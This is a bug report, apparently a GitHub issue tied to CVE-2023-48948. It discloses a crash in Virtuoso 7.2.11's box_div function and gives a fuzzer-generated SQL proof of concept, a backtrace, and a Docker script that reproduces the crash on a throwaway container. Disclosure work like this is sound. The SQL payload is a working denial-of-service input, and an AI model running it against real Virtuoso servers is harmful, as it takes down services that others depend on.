CVE-2023-48948: Fuzzer: Virtuoso 7.2.11 crashed at box_div · Issue #1176 · openlink/virtuoso-opensource
An issue in the box_div function of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) by running a crafted SELECT statement.
The PoC was generated by my DBMS fuzzer.
-- Reproducer for the crash described above (CVE-2023-48948): creates table v0,
-- inserts one row, then issues INSERT ... SELECT statements whose subqueries
-- contain a division by zero (`v1 / 0`). Frame #0 of the backtrace below is
-- box_div, so that subexpression is presumably what reaches the faulting code;
-- this is not confirmed by the report itself.
-- NOTE(review): the curly quotes around x (‘x’) look like a rendering artifact
-- of plain ASCII single quotes ('x'); as shown they are unlikely to parse as
-- string literals, so restore straight quotes before feeding this to isql.
CREATE TABLE v0 ( v1 INTEGER NOT NULL PRIMARY KEY ) ; INSERT INTO v0 VALUES ( 95 ) ; INSERT INTO v0 VALUES ( ( SELECT ( -1 , -1 ) * ( 31 , 84 ) FROM v0 WHERE v1 BETWEEN ‘x’ AND ‘x’ OR EXISTS ( SELECT v1 FROM v0 WHERE v1 NOT IN ( SELECT 20 FROM v0 WHERE ( v1 > 2147483647 AND v1 < 271514.000000 ) ) ) ) ) ; INSERT INTO v0 SELECT v1 + v1 + v1 FROM v0 ORDER BY v1 ; INSERT INTO v0 VALUES ( ( SELECT ( 34 , 16 ) * ( 41 , -128 ) FROM v0 WHERE v1 BETWEEN ‘x’ AND ‘x’ OR EXISTS ( SELECT v1 FROM v0 WHERE v1 + v1 * 24 / 50820962.000000 - 0 / 86183090.000000 IN ( SELECT DISTINCT v1 FROM v0 WHERE ‘x’ OR ( ( ( v1 / 0 ) ) [ 35 ] ) * 16 BETWEEN ‘x’ AND ‘x’ GROUP BY v1 , v1 ) ) ) ) ;
backtrace:
#0 0xc210f3 (box_div+0x83) #1 0x754f4e (code_vec_run_v+0x1c9e) #2 0x7b86bb (end_node_input+0x13b) #3 0x7af05e (qn_input+0x3ce) #4 0x7af78f (qn_ts_send_output+0x23f) #5 0x7b509e (table_source_input+0x16ee) #6 0x7af05e (qn_input+0x3ce) #7 0x44c979 (chash_fill_input+0x589) #8 0x5370af (hash_fill_node_input+0xef) #9 0x7af05e (qn_input+0x3ce) #10 0x7af4c6 (qn_send_output+0x236) #11 0x8214bd (set_ctr_vec_input+0x99d) #12 0x7af05e (qn_input+0x3ce) #13 0x751d38 (subq_next+0x258) #14 0x8201a2 (ins_vec_subq+0x2a2) #15 0x753c6b (code_vec_run_v+0x9bb) #16 0x7b8737 (end_node_input+0x1b7) #17 0x7af05e (qn_input+0x3ce) #18 0x7c1be9 (qr_dml_array_exec+0x839) #19 0x7ce602 (sf_sql_execute+0x15d2) #20 0x7cecde (sf_sql_execute_w+0x17e) #21 0x7d799d (sf_sql_execute_wrapper+0x3d) #22 0xe214bc (future_wrapper+0x3fc) #23 0xe28dbe (_thread_boot+0x11e) #24 0x7ff8b497a609 (start_thread+0xd9) #25 0x7ff8b474a133 (clone+0x43)
Steps to reproduce (write the PoC to /tmp/test.sql first):
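# Reproduction script for the box_div crash: starts a disposable Virtuoso
# 7.2.11 container, confirms isql can reach it, then feeds the PoC to it.
# Expects the PoC to have been written to /tmp/test.sql beforehand.
# Fixes relative to the steps as posted: the comment markers that the issue
# rendering dropped are restored, and the sanity query uses ASCII double
# quotes (the curly quotes would be passed through to isql verbatim).

# the PoC must exist before anything else is started
[ -f /tmp/test.sql ] || { echo "missing /tmp/test.sql (write the PoC there first)" >&2; exit 1; }

# remove the old container, if any (-f also stops a running one)
docker container rm virtdb_test -f

# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11

# wait for the server to start; fixed delay, increase it if the sanity query below fails
sleep 10

# check whether a simple query works before running the PoC
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba

# run the PoC; the server is expected to crash (see backtrace above)
docker exec -i virtdb_test isql 1111 dba < /tmp/test.sql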